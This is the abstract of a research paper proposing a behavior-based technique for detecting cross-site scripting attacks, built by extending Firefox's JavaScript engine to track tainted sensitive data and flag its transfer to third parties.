Research And Implementation Of Behavior-based Cross-Site Scripting Attack Detection Technique

With the rapid development of Computer and Network technology, Internet has brought people into a more wonderful virtual world. Many Web sites make extensive use of client-side script (mostly written in JavaScript) to enhance user experience. However, when this technology enhances the interaction of web pages, it also brings some security problems, such as user information leakage. At present, security service providers have developed various kinds of tools to protect the security of user information, but most of these tools are signature-based, which are not able to handle the security risks in a timely way. To protect the security of web users'information effectively, this paper emphasizes to discuss the theory and flow for attacking in cross-site scripting (XSS) with dynamic code obfuscation (DCO) technology, and proposes a behavior-based XSS detection technique.The main purpose of XSS is to steal the user's sensitive information, as its behavior is to send user's sensitive information to a third party without the user's authorization, we can get the XSS attack detection results by analyzing the situation of user's accessing sensitive information in current page. The detection technique presented in this paper adopts the idea of protecting user information in client-side of the Web browser. It will analyze the behavior of current page's accessing sensitive information by tracking the flow of tainted data. If some tainted data will be transferred to a third party, the current operation will be assumed suspicious. In the implementation, this paper chooses the open-source Web browser Mozilla Firefox as its experimental platform. By analyzing its JavaScript engine, we extend its handle process in each phase. Our approach employs dynamic analysis techniques in general, and an auxiliary static analysis technique when necessary to analyze the situation of sensitive information in current page. By handling and judging the analysis result, we can prevent the suspicious XSS attack. If sensitive information is about to transferred to a third party, the user can decide if this should be permitted or not. The results of our experiment have demonstrated that the behavior-based XSS detection technique proposed in this paper is feasible in practice.